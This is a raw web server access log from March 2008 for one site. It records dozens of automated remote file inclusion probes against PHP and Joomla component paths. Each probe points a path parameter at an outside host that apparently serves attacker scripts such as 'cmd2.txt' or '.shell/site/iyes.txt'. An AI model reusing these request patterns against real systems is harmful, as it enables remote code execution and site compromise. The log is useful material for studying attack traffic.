87.236.198.80 - - [27/Mar/2008:07:35:24 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
211.144.35.238 - - [27/Mar/2008:07:36:04 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:07:36:05 -0700] "GET /index.php?option=com_adsmanager&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.144.35.238 - - [27/Mar/2008:07:36:05 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.144.35.238 - - [27/Mar/2008:07:36:05 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.92.88.77 - - [27/Mar/2008:07:36:52 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.92.88.77 - - [27/Mar/2008:07:36:52 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:36:54 -0700] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.92.88.77 - - [27/Mar/2008:07:36:59 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.92.88.77 - - [27/Mar/2008:07:36:59 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.37.111 - - [27/Mar/2008:07:37:48 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:07:38:15 -0700] "GET /logs/access.log/index.php?option=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:07:38:15 -0700] "GET /logs/index.php?option=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:07:38:29 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:07:38:48 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.208.244 - - [27/Mar/2008:07:39:22 -0700] "GET /logs/access_071216.log/main.php?p=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.208.244 - - [27/Mar/2008:07:39:23 -0700] "GET /main.php?p=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.208.244 - - [27/Mar/2008:07:39:23 -0700] "GET /logs/main.php?p=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.13.134.98 - - [27/Mar/2008:07:39:34 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
85.13.134.98 - - [27/Mar/2008:07:39:34 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:07:39:36 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:39:46 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:39:47 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:39:47 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.208.244 - - [27/Mar/2008:07:40:09 -0700] "GET /logs/access_071202.log/main.php?p=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:07:40:22 -0700] "GET /logs/access_080215.log//playing.php/common/db.php?commonpath=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:07:40:22 -0700] "GET //playing.php/common/db.php?commonpath=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:07:40:22 -0700] "GET /logs//playing.php/common/db.php?commonpath=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:07:40:25 -0700] "GET /index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:07:40:43 -0700] "GET /logs/access_080313.log/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:07:40:44 -0700] "GET /logs/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:07:40:51 -0700] "GET /logs/access_080215.log/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:07:40:51 -0700] "GET /logs/access_080219.log//playing.php/common/db.php?commonpath=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:07:40:52 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:07:40:52 -0700] "GET /index.php?option=com_custompages&cpage=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:07:40:52 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:07:40:59 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:07:40:59 -0700] "GET /index.php?option=com_custompages&cpage=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:07:40:59 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.107.242 - - [27/Mar/2008:07:41:07 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.92.88.77 - - [27/Mar/2008:07:41:07 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [27/Mar/2008:07:41:08 -0700] "GET /index.php?option=com_custompages&cpage=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [27/Mar/2008:07:41:08 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:07:41:28 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:07:41:28 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:07:41:29 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:07:41:52 -0700] "GET /logs/access_080312.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:07:42:09 -0700] "GET /index.php?option=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:07:42:37 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:07:42:38 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:07:42:39 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:42:58 -0700] "GET /logs/access_080207.log/config.php?path_to_root=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:42:58 -0700] "GET /config.php?path_to_root=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:42:59 -0700] "GET /logs/config.php?path_to_root=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:07:43:06 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:07:43:07 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:07:43:07 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:43:24 -0700] "GET /logs/access_080213.log/config.php?path_to_root=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.92.88.77 - - [27/Mar/2008:07:43:35 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.92.88.77 - - [27/Mar/2008:07:43:36 -0700] "GET //index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.92.88.77 - - [27/Mar/2008:07:43:37 -0700] "GET /logs//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:43:58 -0700] "GET /logs/access_080125.log/myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:43:59 -0700] "GET /myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:43:59 -0700] "GET /logs/myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.92.88.77 - - [27/Mar/2008:07:44:42 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.92.88.77 - - [27/Mar/2008:07:44:43 -0700] "GET //index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.92.88.77 - - [27/Mar/2008:07:44:44 -0700] "GET /logs//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.92.88.77 - - [27/Mar/2008:07:44:49 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:07:45:30 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [27/Mar/2008:07:45:33 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:07:45:35 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:07:45:35 -0700] "GET //include.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:07:45:35 -0700] "GET /logs//include.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.92.88.77 - - [27/Mar/2008:07:45:37 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [27/Mar/2008:07:45:46 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:07:45:56 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:07:45:56 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:46:02 -0700] "GET /logs/access_080124.log/myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.166.35.71 - - [27/Mar/2008:07:46:53 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.166.35.71 - - [27/Mar/2008:07:46:55 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:07:47:10 -0700] "GET /index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:07:47:49 -0700] "GET /logs/access_080313.log/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:07:47:49 -0700] "GET /logs/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:07:48:01 -0700] "GET /logs/access_080215.log/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.61.37.111 - - [27/Mar/2008:07:48:03 -0700] "GET /logs/access_080119.log/modules/My_eGallery/index.php?basepath=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [27/Mar/2008:07:48:03 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.144.35.238 - - [27/Mar/2008:07:48:26 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.37.111 - - [27/Mar/2008:07:48:27 -0700] "GET /logs/access_071227.log/modules/My_eGallery/index.php?basepath=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.146.251.123 - - [27/Mar/2008:07:48:45 -0700] "GET /logs/access_071216.log/main.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [27/Mar/2008:07:48:46 -0700] "GET /main.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [27/Mar/2008:07:48:46 -0700] "GET /logs/main.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.18.207.65 - - [27/Mar/2008:07:48:50 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:07:49:43 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.17.23 - - [27/Mar/2008:07:49:50 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
84.40.17.23 - - [27/Mar/2008:07:49:51 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
87.230.7.194 - - [27/Mar/2008:07:50:31 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
87.230.7.194 - - [27/Mar/2008:07:50:32 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:07:50:47 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:07:50:47 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
203.146.251.123 - - [27/Mar/2008:07:51:38 -0700] "GET /logs/access_071202.log/main.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.246.22.2 - - [27/Mar/2008:07:51:49 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/h4_dy/word.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:07:51:56 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:07:51:56 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.111 - - [27/Mar/2008:07:51:56 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:07:51:56 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.101 - - [27/Mar/2008:07:51:57 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.86.238.86 - - [27/Mar/2008:07:52:02 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.238.86 - - [27/Mar/2008:07:52:03 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:07:52:09 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:07:52:14 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://bnb-chambresdhotes.ch/components/com_easygallery/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:07:52:14 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://bnb-chambresdhotes.ch/components/com_easygallery/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:07:52:15 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://bnb-chambresdhotes.ch/components/com_easygallery/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.86.238.86 - - [27/Mar/2008:07:52:21 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:07:52:28 -0700] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:07:52:29 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:07:52:29 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
